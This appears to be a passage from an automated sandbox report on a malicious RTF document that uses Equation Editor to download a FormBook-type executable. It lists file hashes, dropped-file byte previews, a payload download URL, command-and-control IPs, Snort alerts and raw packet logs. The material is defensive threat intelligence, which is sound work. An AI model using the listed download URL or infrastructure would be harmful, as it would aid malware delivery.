                                                                          shops.myshopify.comihJ4eSV1of.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          Proforma-Invoice.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          SOA-1236-1132220.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          DHLDOC.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          Payment-402.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          r#U00e1pida confirmaci#U00f3n.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          f2KeE36B3L.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          5UW4Epp3Ag.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          triage_dropped_file.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          vbc.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          DEC SOA_09012022.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          Ocxwgtrrxrnbohidoxavjksseafwerivek.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          PO-28122021.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          Shipping invoice2320214010.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          Payment Advice.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          HvyylYzB2G.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          Shipping_Doc_0000000.docGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          nbg6l8NcIU.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          IdSKRE4TmL.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74

                                                                          ASN

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          GBTCLOUDUSTwWJnYJiJN.exeGet hashmaliciousBrowse
                                                                          • 2.56.56.185
                                                                          INV_20221301 DECEMBER SOA.xlsxGet hashmaliciousBrowse
                                                                          • 2.56.56.185
                                                                          swift october.xlsxGet hashmaliciousBrowse
                                                                          • 2.56.56.185
                                                                          Payment Slip.docGet hashmaliciousBrowse
                                                                          • 2.58.149.41
                                                                          POs_002.docGet hashmaliciousBrowse
                                                                          • 2.58.149.41
                                                                          INQUIRY 12 7.docGet hashmaliciousBrowse
                                                                          • 2.58.149.41
                                                                          INF.docGet hashmaliciousBrowse
                                                                          • 2.58.149.41
                                                                          12-1-22.docGet hashmaliciousBrowse
                                                                          • 2.58.149.41
                                                                          002774936211.docGet hashmaliciousBrowse
                                                                          • 2.58.149.41
                                                                          KcnNRowzqk.exeGet hashmaliciousBrowse
                                                                          • 2.58.149.98
                                                                          7xkDnbwPK4.exeGet hashmaliciousBrowse
                                                                          • 2.58.149.98
                                                                          i2XRNGaTcDGet hashmaliciousBrowse
                                                                          • 2.58.149.214
                                                                          VK4THB2dY0Get hashmaliciousBrowse
                                                                          • 2.58.149.214
                                                                          EXPfoLJUlRGet hashmaliciousBrowse
                                                                          • 2.58.149.214
                                                                          0y6Lqx63DoGet hashmaliciousBrowse
                                                                          • 2.58.149.214
                                                                          lMnIONuVgcGet hashmaliciousBrowse
                                                                          • 2.58.149.214
                                                                          uctS8qS5OIGet hashmaliciousBrowse
                                                                          • 2.58.149.214
                                                                          id1fbT0Dr6Get hashmaliciousBrowse
                                                                          • 2.58.149.214
                                                                          sXW2iMJ3eEGet hashmaliciousBrowse
                                                                          • 2.58.149.214
                                                                          KLGhPzezHKGet hashmaliciousBrowse
                                                                          • 2.58.149.214
                                                                          CLOUDFLARENETUSNEW QUOTATION.docGet hashmaliciousBrowse
                                                                          • 162.159.137.85
                                                                          DKD-8012537.xlsmGet hashmaliciousBrowse
                                                                          • 104.21.21.122
                                                                          mpDeo5dkyz.exeGet hashmaliciousBrowse
                                                                          • 104.21.43.155
                                                                          01 3pm.htmGet hashmaliciousBrowse
                                                                          • 66.235.200.147
                                                                          v8YnxUbz23.exeGet hashmaliciousBrowse
                                                                          • 104.21.38.221
                                                                          AV4B2JNFQE859.htmlGet hashmaliciousBrowse
                                                                          • 104.16.19.94
                                                                          INV.htmlGet hashmaliciousBrowse
                                                                          • 104.16.18.94
                                                                          Vessel Particulars_pdf.exeGet hashmaliciousBrowse
                                                                          • 172.67.151.227
                                                                          6CQieC3oMC.exeGet hashmaliciousBrowse
                                                                          • 162.159.129.233
                                                                          'Vm Note'info On Thu, 13 Jan 2022 15%3A59%3A09 +0100.htmlGet hashmaliciousBrowse
                                                                          • 104.16.18.94
                                                                          ihJ4eSV1of.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          Oo8GcnVrGH.exeGet hashmaliciousBrowse
                                                                          • 104.21.38.221
                                                                          T5rsSKuAyT.exeGet hashmaliciousBrowse
                                                                          • 104.21.3.248
                                                                          m357poQyhs.exeGet hashmaliciousBrowse
                                                                          • 104.21.37.76
                                                                          hf7r8jObwA.exeGet hashmaliciousBrowse
                                                                          • 104.21.62.142
                                                                          #Ud83d#Udd0aVN_1min21sec_ 3pm.HTMLGet hashmaliciousBrowse
                                                                          • 104.16.19.94
                                                                          O4Zr5T0c9f.exeGet hashmaliciousBrowse
                                                                          • 104.21.12.125
                                                                          qyLAijGe7S.exeGet hashmaliciousBrowse
                                                                          • 162.159.138.85
                                                                          GP32t1WkPk.exeGet hashmaliciousBrowse
                                                                          • 162.159.138.85
                                                                          RFQ IMAGES AND SPECIFICATIONS-DTD JANUARY 2022.xlsxGet hashmaliciousBrowse
                                                                          • 104.18.27.58

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:downloaded
                                                                          Size (bytes):707072
                                                                          Entropy (8bit):7.1557818019777
                                                                          Encrypted:false
                                                                          SSDEEP:6144:Y+xYKKAB5ADeIVvcDK8OpvlmXsC2GxfjpWHpxFvMUXvoHVgDaiYCpslXGqoohdZy:Y+bYeIVwl5dCWdloqXkz53iA55suuI
                                                                          MD5:8807C2E0F2973A22812AF6E61BA72667
                                                                          SHA1:20BDCA62A8D0C98F8DB2C9FF1E3AB13DC4849514
                                                                          SHA-256:4228CCE8278F840721D9F04FEA140B942C14D45938D07C1FA36A29712DDA441C
                                                                          SHA-512:05AF426C3133B5B71F74E6754C139ACD8BAA6C3A492719C223403C9F859CDF9EFE12739D8B35C9CB2E4126FA54080E91894AB6A40E417894EF14A218B88FA527
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: Metadefender, Detection: 34%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 51%
                                                                          IE Cache URL:http://peak-tv.tk/medicomzx.exe
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............P.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......................$...`#............................................("...*&..(#....*.s$........s%........s&........s'........s(........*...0...........~....o)....+..*.0...........~....o*....+..*.0...........~....o+....+..*.0...........~....o,....+..*.0...........~....o-....+..*.0..<........~.....(......,!r...p.....(/...o0...s1............~.....+..*.0...........~.....+..*".......*.0..&........(....r%..p~....o2...(3.....t$....+..*Vs....(4...t.........*..(5...*.0..........
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                          Category:dropped
                                                                          Size (bytes):5632
                                                                          Entropy (8bit):4.123128557938953
                                                                          Encrypted:false
                                                                          SSDEEP:96:SB9fMP/FyI+brWXL9TQ9IJp0Mhrq/2BpWYjuGFkZu:SB9UP/SrWXLiWaMYOPOF
                                                                          MD5:6D550004A108E472ACB60AFA74AECBAD
                                                                          SHA1:A43A215E06FEAA84FD26BBB00439A041448B484A
                                                                          SHA-256:5B58844E1C55D5D069C4E7D10EF267AD2F0C93E239265FD8FB51930CED238C6C
                                                                          SHA-512:3CFD4B10E88C6CA7B31AA12BAC4B2642DFC50B426A0A597D2A836578A3A3C4FD4F90756A3FCE2AC43A52AB1E46FA356D7BA3F7AA0962B0D024131504A7CF1E8A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8CA50CAD-0168-40C5-9DE5-3A2EB92A8144}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1024
                                                                          Entropy (8bit):0.05390218305374581
                                                                          Encrypted:false
                                                                          SSDEEP:3:ol3lYdn:4Wn
                                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                          Malicious:false
                                                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A1ACA359-D73C-4E90-86E8-AE0089CF8F67}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):9216
                                                                          Entropy (8bit):3.481183177856214
                                                                          Encrypted:false
                                                                          SSDEEP:192:o3uVHzr2R9THXsibKVEbyKbQTjKiqeOCs0XqK2WP1vTOkpc76EnZ:o+VzrkBNPecQTee/aK2+OEiZ
                                                                          MD5:1ED77075EA7EA8E9B6386E63B1F8F682
                                                                          SHA1:7F3E9A5B4FEC84D3298D32A6BB1D8A8E89866C24
                                                                          SHA-256:AB2DDDC94896F581777EA638395F5FAC4F42F368AEC3932BDF1EDA21328B5866
                                                                          SHA-512:E58451151D174E46965E7DD18D785A273571BE2CAADC2F86C97E695EBD7C2AD4967D8C15DA14C7705023E64B4B330201A374080F759C6D9A24B3227AD083699C
                                                                          Malicious:false
                                                                          Preview: ..%.^.@.+.*.&.7.8.-.[./.?._.?.,.0...6.3.8.<.~.-.6.?.%.'.;.[...1.,.#.3.5.-.4.#.^.`...?.?...@.[.3._...4.,.3.3.&.1.$./.9.*.].'.7.?.*.?.%.~.+.6.?.0...@.!.?._.'.6.).5.-.>.?.$.].~.+.:.;.*.,...;.?.../.1.&.4.6.|.'._.+.].?.?.!.`.?.[.+.*.;.=.@.?.?.|.'.?.7.9.'.%.+.;.%.?.=.~.'.|.,.+...$.6.?.?.%.*.1.(.$.9.?.,.`.?.,.;...;.].&.%.*.!._.5.6.6.=.#.#.@._.|.~.+./.%.5.$.?.%.$.1.9.0.`.%.'.3.0.,.+.%.7.=.|...[.:...,.?.].1.8.[.<.1.~.>.)...?.>.3.#.*.,...?.`.4.1.@.2.7.?.3...#.;.@.;.2._.?.6.0.1.4.~.#.%.@.0.+.(.>.5.0.>.4.-.=.'.;...&.#.7.&.:.4.=.&.4...!.?.8.*.]._.:.>.2.%.*.2...>.3.|...6.=.9.%.:.6.-.`.`.$.+...?.$...3.;.#./.9.8...-.!.8.+.2.^.:.8.;.?.?./...7.%.....<.?.^.~.3.7.~.(.@.,.;.;.2.'.#.5.?.$.?.&.6.>.(.<.'._._.`.,.+.[.-.;.'.*.2...[.....>.?.5.$...1.:.?.?.!.5.0.@.).[.>._.&.=.?.?.8...;.`.0.-._.`...*.?._.!.^.%...&...?.8.%.+.;.-...`.3._.3...?.?.^...'.].>.3.$.@.?.*.?.?...?.,.`.5.$.^.?.?.$._.?...#./.>.%./.!.9.^.|.@.;.=.8.!.(.9.4...%.8.].[.?.?.?.!.3.[.1.-.>.>.7.?.@.2.^.+.+...?.7.<.3.-.].[.1.8.$.?.,.0.^.:.=.?.%.5.*.).8.
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO789.LNK
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Fri Jan 14 01:16:16 2022, length=21489, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):985
                                                                          Entropy (8bit):4.502552260196471
                                                                          Encrypted:false
                                                                          SSDEEP:12:81exRgXg/XAlCPCHaXeBhB/OW9qX+WvvTicvbp04loDtZ3YilMMEpxRljK2QMTd+:8an/XTuzLINGeHoDv3qSAQd7Qy
                                                                          MD5:8BDC5B1FDC8B42BFCED301566877791E
                                                                          SHA1:D296ED0B91FA1FD37358AD09E026DD88C1270962
                                                                          SHA-256:65F2C698BA65C4FD314A4470EC3940F5EA2CD6E1C19AC315D0DF1932FEE46F3C
                                                                          SHA-512:81058FD9BAE0CED6E9EDAE6C25AB053FAEA2347357B2316B0DE6A25A6CE8EDE5C0AC8F6A2B3B527EE775140FF50FCBBA22223C1E4C5A712B315D0B6C81B53659
                                                                          Malicious:false
                                                                          Preview: L..................F.... .....?.....?...........S...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....X.2..S...T.. .PO789.doc.@.......S ..S .*.........................P.O.7.8.9...d.o.c.......s...............-...8...[............?J......C:\Users\..#...................\\745481\Users.user\Desktop\PO789.doc. .....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.7.8.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......745481..........D_....3N...W...9..g............[D_....3N...W...9..g............[....
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):61
                                                                          Entropy (8bit):4.643794821759313
                                                                          Encrypted:false
                                                                          SSDEEP:3:bDuMJlt+jomX1gHjov:bCmQIDy
                                                                          MD5:DAE12E95560EA2CA4F86AC4515A68F33
                                                                          SHA1:5A1ACBDF73F62480BEFE51B3DF654745BF6AAE74
                                                                          SHA-256:141FA7A3959432D83CCA3841FDDFDA6108B2BCA2FFAED58CE4146A9D2BF898AD
                                                                          SHA-512:152A5EA111E388591175CC2386DAE6ED8CF7B4CCCED0B73339142FAA41122B94D64098F9F8312B7B6BA2078609438DCA5F617773C68310A45753F9E7D2B54381
                                                                          Malicious:false
                                                                          Preview: [folders]..Templates.LNK=0..PO789.LNK=0..[doc]..PO789.LNK=0..
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):162
                                                                          Entropy (8bit):2.5038355507075254
                                                                          Encrypted:false
                                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                          Malicious:false
                                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                          C:\Users\user\AppData\Roaming\medicomsh78694.exe
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):707072
                                                                          Entropy (8bit):7.1557818019777
                                                                          Encrypted:false
                                                                          SSDEEP:6144:Y+xYKKAB5ADeIVvcDK8OpvlmXsC2GxfjpWHpxFvMUXvoHVgDaiYCpslXGqoohdZy:Y+bYeIVwl5dCWdloqXkz53iA55suuI
                                                                          MD5:8807C2E0F2973A22812AF6E61BA72667
                                                                          SHA1:20BDCA62A8D0C98F8DB2C9FF1E3AB13DC4849514
                                                                          SHA-256:4228CCE8278F840721D9F04FEA140B942C14D45938D07C1FA36A29712DDA441C
                                                                          SHA-512:05AF426C3133B5B71F74E6754C139ACD8BAA6C3A492719C223403C9F859CDF9EFE12739D8B35C9CB2E4126FA54080E91894AB6A40E417894EF14A218B88FA527
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: Metadefender, Detection: 34%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 51%
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............P.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......................$...`#............................................("...*&..(#....*.s$........s%........s&........s'........s(........*...0...........~....o)....+..*.0...........~....o*....+..*.0...........~....o+....+..*.0...........~....o,....+..*.0...........~....o-....+..*.0..<........~.....(......,!r...p.....(/...o0...s1............~.....+..*.0...........~.....+..*".......*.0..&........(....r%..p~....o2...(3.....t$....+..*Vs....(4...t.........*..(5...*.0..........
                                                                          C:\Users\user\Desktop\~$PO789.doc
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):162
                                                                          Entropy (8bit):2.5038355507075254
                                                                          Encrypted:false
                                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                          Malicious:true
                                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                          Static File Info

                                                                          General

                                                                          File type:Rich Text Format data, unknown version
                                                                          Entropy (8bit):3.6305852926898945
                                                                          TrID:
                                                                          • Rich Text Format (5005/1) 55.56%
                                                                          • Rich Text Format (4004/1) 44.44%
                                                                          File name:PO789.doc
                                                                          File size:21489
                                                                          MD5:6c28e31d32e97db724188025636ac25e
                                                                          SHA1:c5818d1883785293dfab00d2c1389b82cc74ad60
                                                                          SHA256:c24d7ca6493677f640cf6d4a90c746f949749f46e45873d77a71b94ab707a21f
                                                                          SHA512:a22a65663670274098a9259314e1789b97d8ca1a11e8758eb08ee673d19755bf836f2346167dfaec5839a2ab77ff45c922e792b609c17c3c92d771c5d4af8463
                                                                          SSDEEP:384:d5vSln/51N+CYmIX1GeQC9/x7U3AJul04:d5vSln/N+LGeQCmwue4
                                                                          File Content Preview:{\rtf872.%^@+*&78-[/?_?,0.638<~-6?%';[.1,#35-4#^`.??.@[3_.4,33&1$/9*]'7?*?%~+6?0.@!?_'6)5->?$]~+:;*,.;?./1&46|'_+]??!`?[+*;=@??|'?79'%+;%?=~'|,+.$6??%*1($9?,`?,;.;]&%*!_566=##@_|~+/%5$?%$190`%'30,+%7=|.[:.,?]18[<1~>).?>3#*,.?`41@27?3.#;@;2_?6014~#%@0+(>50

                                                                          File Icon

                                                                          Icon Hash:e4eea2aaa4b4b4a4

                                                                          Static RTF Info

                                                                          Objects

                                                                          IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                          0000010C4hno
                                                                          100001073hno

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                          01/13/22-18:18:34.850775TCP1201ATTACK-RESPONSES 403 Forbidden804916823.227.38.74192.168.2.22
                                                                          01/13/22-18:18:53.504983TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.2234.102.136.180
                                                                          01/13/22-18:18:53.504983TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.2234.102.136.180
                                                                          01/13/22-18:18:53.504983TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.2234.102.136.180
                                                                          01/13/22-18:18:53.620393TCP1201ATTACK-RESPONSES 403 Forbidden804917034.102.136.180192.168.2.22
                                                                          01/13/22-18:19:03.995932TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.2291.195.240.13
                                                                          01/13/22-18:19:03.995932TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.2291.195.240.13
                                                                          01/13/22-18:19:03.995932TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.2291.195.240.13

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 13, 2022 18:17:00.130606890 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.157335997 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.157475948 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.157764912 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.184355974 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184818029 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184843063 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184859991 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184878111 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184895039 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184906960 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184921980 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.184923887 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184942007 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184943914 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.184954882 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.184958935 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184976101 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184998035 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.185000896 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.185004950 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.194046974 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211577892 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211611986 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211626053 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211641073 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211658955 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211677074 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211694002 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211710930 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211728096 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211735964 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211745024 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211757898 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211760998 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211760998 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211777925 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211785078 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211795092 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211801052 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211810112 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211818933 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211827040 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211834908 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211843967 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211858988 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211862087 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211874008 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211888075 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211889982 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211891890 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211911917 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211913109 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211920977 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211966991 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.212903976 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238516092 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238545895 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238562107 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238579035 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238579035 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238596916 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238604069 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238615036 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238624096 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238631964 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238647938 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238648891 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238666058 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238667965 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238682985 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238688946 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238699913 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238715887 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238717079 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238734007 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238737106 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238750935 CET80491672.58.149.41192.168.2.22
